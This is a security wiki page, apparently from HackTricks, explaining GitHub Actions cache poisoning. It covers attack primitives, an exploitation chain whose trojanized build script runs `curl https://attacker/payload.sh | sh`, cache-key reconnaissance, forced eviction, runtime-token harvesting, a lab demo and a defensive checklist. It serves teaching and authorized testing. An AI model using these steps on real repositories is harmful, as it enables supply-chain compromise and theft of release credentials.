# GH Actions - Cache Poisoning

> [!TIP]
> Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> Support HackTricks
## Overview

The GitHub Actions cache is global to a repository. Any workflow that knows a cache key (or `restore-keys`) can populate that entry, even if the job only has `permissions: contents: read`. GitHub does not segregate caches by workflow, event type, or trust level, so an attacker who compromises a low-privilege job can poison a cache that a privileged release job will later restore. This is how the Ultralytics compromise pivoted from a `pull_request_target` workflow into the PyPI publishing pipeline.

## Attack primitives

- `actions/cache` exposes both restore and save operations (`actions/cache@v4`, `actions/cache/save@v4`, `actions/cache/restore@v4`). The save call is allowed for any job except truly untrusted `pull_request` workflows triggered from forks.
- Cache entries are identified solely by their key. Broad `restore-keys` make it easy to inject payloads because the attacker only needs to collide with a prefix.
- Cache keys and versions are client-specified values; the cache service does not validate that a key/version pair matches a trusted workflow or cache path.
- The cache server URL and runtime token are long-lived relative to the workflow (historically ~6 hours, now ~90 minutes) and are not user-revocable. As of late 2024, GitHub blocks cache writes after the originating job completes, so attackers must write while the job is still running or pre-poison future keys.
- The cached filesystem is restored verbatim. If the cache contains scripts or binaries that are executed later, the attacker controls that execution path.
- The cache file itself is not validated on restore; it is just a zstd-compressed archive, so a poisoned entry can overwrite scripts, `package.json`, or other files under the restore path.
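As a minimal illustration of the `restore-keys` primitive (the path and keys here are illustrative, not taken from a real incident), a consumer configured like this will fall back, on an exact-key miss, to any entry an attacker seeded under the `pip-` prefix:

```yaml
# Anti-pattern: broad restore-keys let any prefix match win on a cache miss
- uses: actions/cache/restore@v4
  with:
    path: ~/.cache/pip
    key: pip-${{ runner.os }}-${{ hashFiles('requirements.txt') }}
    restore-keys: |
      pip-${{ runner.os }}-
      pip-
```

The attacker does not need to predict the full `hashFiles(...)` digest; saving anything under `pip-Linux-whatever` is enough to be restored on a miss.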

## Example exploitation chain

The low-privilege workflow (`pull_request_target`) poisoned the cache:

```yaml
steps:
  - run: |
      mkdir -p toolchain/bin
      printf '#!/bin/sh\ncurl https://attacker/payload.sh | sh\n' > toolchain/bin/build
      chmod +x toolchain/bin/build
  - uses: actions/cache/save@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}
```

The privileged workflow restored and executed the poisoned cache:

```yaml
steps:
  - uses: actions/cache/restore@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}
  - run: toolchain/bin/build release.tar.gz
```

The second job now runs attacker-controlled code while holding release credentials (PyPI tokens, PATs, cloud deploy keys, etc.).

## Poisoning mechanics

GitHub Actions cache entries are typically zstd-compressed tar archives. You can craft one locally and upload it to the cache:

```bash
tar --zstd -cf poisoned_cache.tzstd cache/contents/here
```

On a cache hit, the restore action will extract the archive as-is. If the cache path includes scripts or config files that are executed later (build tooling, action.yml, package.json, etc.), you can overwrite them to gain execution.
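The mechanics above can be reproduced locally. The sketch below (directory layout, file names, and payload are illustrative) builds a `toolchain` directory containing a trojanized script and packs it the way the cache service stores entries; it assumes a `tar` build with zstd support:

```bash
# Create a directory layout matching the victim workflow's cache `path`
mkdir -p cache_root/toolchain/bin
printf '#!/bin/sh\necho poisoned\n' > cache_root/toolchain/bin/build
chmod +x cache_root/toolchain/bin/build

# Cache entries are stored as zstd-compressed tar archives
tar --zstd -cf poisoned_cache.tzstd -C cache_root toolchain

# Sanity-check the archive contents before uploading it
tar --zstd -tf poisoned_cache.tzstd
```

Uploading still requires a valid runtime token and cache URL from a running job, so the archive is usually staged and saved from within the compromised workflow itself.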

## Practical exploitation tips

- Target workflows triggered by `pull_request_target`, `issue_comment`, or bot commands that still save caches; GitHub lets them overwrite repository-wide keys even when the runner only has read access to the repo.
- Look for deterministic cache keys reused across trust boundaries (for example, `pip-${{ hashFiles('poetry.lock') }}`) or permissive `restore-keys`, then save your malicious tarball before the privileged workflow runs.
- Monitor logs for `Cache saved` entries or add your own cache-save step so the next release job restores the payload and executes the trojanized scripts or binaries.
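To pick keys worth colliding with, a repository's current cache entries can be enumerated through the REST API (`GET /repos/{owner}/{repo}/actions/caches`), which only needs read access. A sketch using the `gh` CLI; the repository argument is a placeholder you supply:

```bash
# Enumerate existing cache keys and sizes for a repository (recon, read-only)
list_cache_keys() {
  repo="$1"   # e.g. owner/name
  if [ -z "$repo" ]; then
    echo "usage: list_cache_keys owner/name"
    return 0
  fi
  gh api "repos/$repo/actions/caches" --paginate \
    --jq '.actions_caches[] | "\(.key)\t\(.size_in_bytes)"'
}

list_cache_keys "${REPO:-}"
```

Deterministic-looking keys (lockfile hashes, OS prefixes) that appear across both PR and release runs are the prime candidates.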

## Newer techniques seen in the Angular (2026) chain

- Cache v2 "prefix hit" behavior: in Cache v2, exact misses can still restore another entry sharing the same key prefix (effectively "all keys are restore keys"). Attackers can pre-seed near-collision keys so a future miss falls back to the poisoned object.
- Forced eviction in one run: since November 20, 2025, GitHub evicts entries immediately when repository cache usage exceeds the limit (10 GB by default). An attacker can upload junk cache data first, evict legitimate entries during the same job, and then write the malicious cache key without waiting for the daily cleanup cycle.
- `setup-node` cache pivots via reusable actions: reusable/internal actions that wrap `actions/setup-node` with `cache-dependency-path` can silently bridge low-trust and high-trust workflows. If both paths hash to shared keys, poisoning the dependency cache can lead to execution in privileged automation (for example Renovate/bot jobs).
- Chaining cache poisoning into bot-driven supply-chain abuse: in the Angular case, cache poisoning exposed a bot PAT, which could then be used to force-push bot-owned PR heads after approval. If approval-reset rules exempt bot actors, this enables swapping reviewed commits for malicious ones (for example imposter action SHAs) before merge.
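The filler-generation half of the forced-eviction step can be sketched as follows. `JUNK_MB` is an illustrative knob kept tiny here; against a real target you would generate enough data to push the repository past its 10 GB quota, then save it under throwaway keys from within the running job:

```bash
# Generate filler data; on a runner you would then save it with
# actions/cache/save under throwaway keys until the repo quota is
# exceeded, evicting the legitimate entries you intend to replace.
JUNK_MB="${JUNK_MB:-1}"   # keep small for local testing
dd if=/dev/urandom of=junk.bin bs=1M count="$JUNK_MB" 2>/dev/null
wc -c junk.bin
```

The point of doing this inside one run is that the eviction and the malicious re-write happen before the job (and its cache-write window) ends.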

## Cacheract

Cacheract is a PoC-focused toolkit for GitHub Actions cache poisoning in authorized testing. The practical value is that it automates the fragile parts that are easy to get wrong manually:

- Detect and use runtime cache context from the runner (`ACTIONS_RUNTIME_TOKEN` and the cache service URL).
- Enumerate and target candidate cache keys/versions used by downstream workflows.
- Force eviction by overfilling the cache quota (when applicable) and then write attacker-controlled entries in the same run.
- Seed poisoned cache content so later workflows restore and execute the modified tooling.

This is especially useful in Cache v2 environments where timing and key/version behavior matter more than in early cache implementations.
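The runtime context Cacheract harvests is just environment material already present on the runner. A sketch of what any job step can inspect (the variable names are the ones consumed by `actions/cache`; outside a runner they are simply unset):

```bash
# Print the cache service context a job step could abuse.
# Real values only exist inside a running GitHub Actions job.
show_cache_ctx() {
  echo "cache url (v1):   ${ACTIONS_CACHE_URL:-<unset>}"
  echo "results url (v2): ${ACTIONS_RESULTS_URL:-<unset>}"
  echo "runtime token:    $([ -n "${ACTIONS_RUNTIME_TOKEN:-}" ] && echo present || echo absent)"
}
show_cache_ctx
```

Because these values are injected into every step, any attacker-controlled script that runs inside the job can talk to the cache service directly, without going through the `actions/cache` action at all.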

## Demo

Use this only in repositories you own or are explicitly allowed to test.

### 1. Vulnerable workflow (untrusted trigger can save cache)

This workflow simulates a `pull_request_target` anti-pattern: it writes cache content from attacker-controlled context and saves it under a deterministic key.

```yaml
name: untrusted-cache-writer
on:
  pull_request_target:
    types: [opened, synchronize, reopened]

permissions:
  contents: read

jobs:
  poison:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build "toolchain" from untrusted context (demo)
        run: |
          mkdir -p toolchain/bin
          cat > toolchain/bin/build << 'EOF'
          #!/usr/bin/env bash
          echo "POISONED_BUILD_PATH"
          echo "workflow=${GITHUB_WORKFLOW}" > /tmp/cache-poisoning-demo.txt
          EOF
          chmod +x toolchain/bin/build
      - uses: actions/cache/save@v4
        with:
          path: toolchain
          key: linux-build-${{ hashFiles('toolchain.lock') }}
```

### 2. Privileged workflow (restores and executes cached binary/script)

This workflow restores the same key and executes `toolchain/bin/build` while holding a dummy secret. If the cache is poisoned, the execution path is attacker-controlled.

```yaml
name: privileged-consumer
on:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  release_like_job:
    runs-on: ubuntu-latest
    env:
      DEMO_SECRET: ${{ secrets.DEMO_SECRET }}
    steps:
      - uses: actions/cache/restore@v4
        with:
          path: toolchain
          key: linux-build-${{ hashFiles('toolchain.lock') }}
      - name: Execute cached build tool
        run: |
          ./toolchain/bin/build
          test -f /tmp/cache-poisoning-demo.txt && echo "Poisoning confirmed"
```

### 3. Run the lab

- Add a stable `toolchain.lock` file so both workflows resolve the same cache key.
- Trigger `untrusted-cache-writer` from a test PR.
- Trigger `privileged-consumer` via `workflow_dispatch`.
- Confirm `POISONED_BUILD_PATH` appears in the logs and `/tmp/cache-poisoning-demo.txt` is created.

### 4. What this demonstrates technically

- Cross-workflow cache trust break: the writer and consumer workflows do not share a trust level, but they share a cache namespace.
- Execution-on-restore risk: no integrity validation is performed before executing a restored script or binary.
- Deterministic key abuse: if a high-trust job uses predictable keys, a low-trust job can preposition malicious content.

### 5. Defensive verification checklist

- Split keys by trust boundary (`pr-`, `ci-`, `release-`) and avoid shared prefixes.
- Disable cache writes in untrusted workflows.
- Hash/verify restored executable content before running it.
- Avoid executing tools directly from cache paths.
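The "hash/verify before running" item can be sketched as a small guard; the pinned digest would be committed to the repository (and thus covered by code review), never stored in the cache itself. Function and variable names here are illustrative:

```bash
# Refuse to execute a restored tool unless it matches a pinned digest.
verify_and_run() {
  tool="$1"; expected_sha256="$2"
  actual=$(sha256sum "$tool" | cut -d' ' -f1)
  if [ "$actual" = "$expected_sha256" ]; then
    "$tool"
  else
    echo "integrity check failed for $tool" >&2
    return 1
  fi
}

# Usage in the privileged job, with the digest committed to the repo:
# verify_and_run toolchain/bin/build "$PINNED_BUILD_SHA256"
```

This converts a silent execution-on-restore into a hard failure whenever a poisoned entry replaces the expected binary.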
